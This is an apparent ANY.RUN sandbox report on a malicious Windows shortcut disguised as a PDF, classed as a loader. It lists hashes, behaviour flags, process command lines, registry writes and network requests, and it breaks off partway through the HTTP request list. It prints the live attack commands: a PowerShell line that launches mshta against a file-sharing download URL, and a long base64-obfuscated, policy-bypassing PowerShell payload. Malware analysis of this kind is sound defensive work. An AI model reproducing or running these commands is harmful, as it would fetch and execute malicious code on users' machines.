File name:

pussy.pdf.lnk

Full analysis: https://app.any.run/tasks/7bf7d10e-4604-4b8f-87fb-79bde80b88e0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 16:31:14
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

D9BC07E8CA61DAA947B6AB41CFCD549D

SHA1:

0818CAB1D714A5C0E7D44392A28785DD826300B2

SHA256:

EC52E869927D212B5662143D8F5E0064B465CED789A071CDC0A99B1241B804AD

SSDEEP:

24:8N84Zsx/Tff1efVKayWtC+/CWgFXO62fVTlP4HnLgMUPddS9dbEQPEZ/7QAMN5:8wTX1e3ztoFe62fVR2UPdo9aQPa7Q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4988)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 1672)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Executes script without checking the security policy

      • powershell.exe (PID: 4988)
      • powershell.exe (PID: 5376)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 1672)
      • cmd.exe (PID: 728)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 5376)

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4988)

    • There is functionality for taking screenshot (YARA)

      • AcroCEF.exe (PID: 7212)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1672)

    • Checks proxy server information

      • mshta.exe (PID: 1672)
      • powershell.exe (PID: 4988)
      • slui.exe (PID: 7932)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Disables trace logs

      • powershell.exe (PID: 4988)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4988)

    • Creates files in the program directory

      • powershell.exe (PID: 4988)

    • Application launched itself

      • Acrobat.exe (PID: 6768)
      • AcroCEF.exe (PID: 1568)

    • Reads the software policy settings

      • slui.exe (PID: 976)
      • slui.exe (PID: 7932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2')
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
27
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs slui.exe ucpdmgr.exe no specs conhost.exe no specs ucpdmgr.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
208"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1512 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
728"C:\WINDOWS\system32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABUAEIAZgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAOQA2ADgANQA0ADIAOAAyADQANwAyADYAMwA2AEMAMgBDADIAMAAyADQANgA3ADQAQwA3ADUAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAyADYAMwA2AEMAMgAwADIANAA2ADcANABDADcANQAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcAOAA0AEUANQAzADIAOAAyADQANwAyADYAMwA2AEMAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAyADYAMwA2AEMAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANAA5ADcAOQA1ADQAMgA4ADIANAA1ADQANAAyADYANgAyADkANwBCADIANAA1ADUANABEADQAQQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2AEQANgBBADYAQQAyADAANAAwADIAOAAzADEAMwA1ADMAOQAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwA3ADIAQwAzADEAMwAyADMANwAyAEMAMwAxADMANgAzADgAMgBDADMAMQAzADgAMwAyADIAQwAzADEAMwA3ADMAOQAyAEMAMwAxADMANAAzADgAMgBDADMAMQAzADgAMwA5ADIAQwAzADEAMwA4ADMANgAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwAxADIAQwAzADEAMwA5ADMANwAyADkAMgA5ADMAQgAyADQANgA3ADQAQwA3ADUAMgAwADMARAAyADAAMgA0ADUANQA0AEQANABBADIARQA0ADQANgBGADcANwA2AEUANgBDADYARgA2ADEANgA0ADQANAA2ADEANwA0ADYAMQAyADgAMgA0ADUANAA0ADIANgA2ADIAOQAzAEIANwAyADYANQA3ADQANwA1ADcAMgA2AEUAMgAwADIANAA2ADcANABDADcANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYARAA2AEEANgBBADIAOAAyADQANAA5ADYAMQA1ADkAMgA5ADcAQgAyADgAMgA0ADQAOQA2ADEANQA5ADIAMAA3AEMAMgA1ADcAQgAyADAANQBCADYAMwA2ADgANgAxADcAMgA1AEQAMgA4ADIANAA1AEYAMgAwADIARAAyADAAMwA4ADMAMQAyADkAMgAwADcARAAyADkAMgAwADIARAA2AEEANgBGADYAOQA2AEUAMgAwADIANwAyADcANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA0ADMANgBFADQAQgAyADgAMgA5ADcAQgAyADQANgBFADYAQQA1ADEAMgAwADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA1ADAANwAyADYARgA2ADcANwAyADYAMQA2AEQANAA0ADYAMQA3ADQANgAxADIAMAAyAEIAMgAwADIANwA1AEMAMgA3ADMAQgAyADQANgAyADYARQA3ADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAzAEIAMgA0ADQANgA3ADMANAA1ADIAMAAzAEQAMgAwADIANAA2ADIANgBFADcAMAAyADAAMgBCADIAMAAyADcANQBDADcAMwA2ADEANgBEADcAMAA2AEMANgA1ADIARQA3ADAANgA0ADYANgAyADcAMwBCADQAOQA2ADYAMgA4ADUANAA2ADUANwAzADcANAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyADQANAA2ADcAMwA0ADUAMgA5ADcAQgA2ADkANgA5ADIAMAAyADQANAA2ADcAMwA0ADUAMwBCADcARAA0ADUANgBDADcAMwA2ADUANwBCADIAMAAyADQANwAxADcAOQA3ADcAMgAwADMARAAyADAANAA5ADcAOQA1ADQAMgAwADIAOAA2AEQANgBBADYAQQAyADAANAAwADIAOAAzADEAMwA4ADMANQAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwA3ADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAOQAzADYAMgBDADMAMQAzADMAMwA5ADIAQwAzADEAMwAyADMAOAAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMAMQAyAEMAMwAxADMAOAAzADMAMgBDADMAMQAzADkAMwAyADIAQwAzADEAMwA3ADMAOQAyAEMAMwAxADMAOAAzADcAMgBDADMAMQAzADgAMwAyADIAQwAzADEAMwA4ADMAMAAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADIAMwA3ADIAQwAzADEAMwA4ADMAMAAyAEMAMwAxADMAOQAzADIAMgBDADMAMQAzADkAMwAwADIAQwAzADEAMwAyADMAOAAyAEMAMwAxADMAOQAzADMAMgBDADMAMQAzADgAMwAxADIAQwAzADEAMwA4ADMAMwAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwA2ADIAQwAzADEAMwA3ADMAOAAyAEMAMwAxADMAOQAzADAAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMAOQAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADIAMwA3ADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAOAAzADEAMgBDADMAMQAzADgAMwAzADIAOQAyADkAMwBCADUAOQA2ADgANQA0ADIAMAAyADQANAA2ADcAMwA0ADUAMgAwADIANAA3ADEANwA5ADcANwAzAEIANgA5ADYAOQAyADAAMgA0ADQANgA3ADMANAA1ADMAQgA3AEQAMwBCADMAQgAzAEIAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQAyADAAMwBEADIAMAAyADQANgBFADYAQQA1ADEAMgAwADIAQgAyADAAMgA3ADcAMAA3ADUANwA0ADcANAA3ADkAMgBFADYANQA3ADgANgA1ADIANwAzAEIANgA5ADYANgAyADgANQA0ADYANQA3ADMANwA0ADIARAA1ADAANgAxADcANAA2ADgAMgAwADIANAA2AEQANwA5ADYANAA0ADYANAA2ADQARgA0AEQANAAxADQAMwA1AEEAMgA5ADcAQgA3ADgANABFADUAMwAyADAAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADQANwAxADQAMwA1ADAANwAzADQARAA1ADAANwAyADcANwA2ADEANgBFADcAOQAzAEQANAA5ADcAOQA1ADQAMgA4ADYARAA2AEEANgBBADIAMAA0ADAAMgA4ADMAMQAzADgAMwA1ADIAQwAzADEAMwA5ADMANwAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwAzADMAOQAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADIAMwA4ADIAQwAzADEAMwA5ADMANwAyAEMAMwAxADMAOAAzADIAMgBDADMAMQAzADkAMwAwADIAQwAzADEAMwA5ADMAMwAyAEMAMwAxADMAMgAzADcAMgBDADMAMQAzADkAMwA2ADIAQwAzADEAMwA4ADMANQAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA4ADMAMgAyAEMAMwAxADMAOAAzADMAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA4ADMANwAyAEMAMwAxADMAMgAzADgAMgBDADMAMQAzADkAMwAzADIAQwAzADEAMwA5ADMAOAAyAEMAMwAxADMAOQAzADcAMgBDADMAMQAzADkAMwA3ADIAQwAzADIAMwAwADMAMgAyAEMAMwAxADMAMgAzADcAMgBDADMAMQAzADgAMwAyADIAQwAzADIAMwAwADMAMQAyAEMAMwAxADMAOAAzADIAMgA5ADIAOQAzAEIANQA5ADYAOAA1ADQAMgAwADIANAA2AEQANwA5ADYANAA0ADYANAA2ADQARgA0AEQANAAxADQAMwA1AEEAMgAwADIANAA3ADEANAAzADUAMAA3ADMANABEADUAMAA3ADIANwA3ADYAMQA2AEUANwA5ADMAQgA3ADgANABFADUAMwAyADAAMgA0ADYARAA3ADkANgA0ADQANgA0ADYANABGADQARAA0ADEANAAzADUAQQA3AEQAMwBCADMAQgAzAEIANwBEADQAMwA2AEUANABCADMAQgAnADsAJABVAE0ASgA9ACcAJwA7ACAAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAFQAQgBmAC4ATABlAG4AZwB0AGgAOwAkAGkAKwA9ADIAKQB7ACQAVQBNAEoAKwA9AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAFQAQgBmAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAyACkALAAxADYAKQApAH0AOwAgACYAIAAoACAAJABVAE0ASgBbADAALgAuADIAXQAgAC0AagBvAGkAbgAgACcAJwAgACkAIAAoACAAJABVAE0ASgBbADMALgAuACgAJABVAE0ASgAuAEwAZQBuAGcAdABoAC0AMQApAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApAA==C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
900"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
976"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1188"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1532\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcrobat.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1672"C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/MVSMFskQ/LO8xSpi2.62ec7135a2f4fdd6669b0320481d33d2C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
2148"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1320,i,16749194963983569736,6060146968047278014,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
32 686
Read events
32 576
Write events
107
Delete events
3

Modification events

(PID) Process:(900) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4988) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(6768) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(6768) Acrobat.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\Acrobatbrokerserverdispatchercpp789
Operation:delete keyName:(default)
Value:
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(5352) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
Executable files
1
Suspicious files
206
Text files
17
Unknown types
0

Dropped files

PID
Process
Filename
Type
900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DD8D90QY9SHOJEOZ17ZA.tempbinary
MD5:7432332B273AF3EB4C1EB9FC4DC781B3
SHA256:7411FEF0D0A891D7F83543AA4EFA7CFDB53706AA0D3A12FA7C0FFAF83DB3085B
900powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_im2tyewk.x5a.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\814694d7f1786cf4.customDestinations-msbinary
MD5:7432332B273AF3EB4C1EB9FC4DC781B3
SHA256:7411FEF0D0A891D7F83543AA4EFA7CFDB53706AA0D3A12FA7C0FFAF83DB3085B
900powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:F3A9001EE56DEB6624781087E0A95B4C
SHA256:061479E9A25D98FB19173DFDAF8373B8C23F0C96A2C7A587EF91A62DBF65B34B
1672mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2Dbinary
MD5:BBC136E060A85689BDB61D7AF6E53C7A
SHA256:0B4C033E80F6883EB8A58DEA923A7796E00ED691478D383EE63C14E8DB275F52
5376powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ytpqsetk.oad.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JXG0AVZTDBDJFJYTLVB8.tempbinary
MD5:06DE151A3F90C5491165E0A85A659465
SHA256:C44DFF4596602717385A89C8E23F87181B1A7911500D125EBCA9847AC28DF210
5376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10d5a1.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:06DE151A3F90C5491165E0A85A659465
SHA256:C44DFF4596602717385A89C8E23F87181B1A7911500D125EBCA9847AC28DF210
4988powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2bhqljzh.tip.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
48
DNS requests
28
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
http://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CCBQTt66J8t%2BK
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
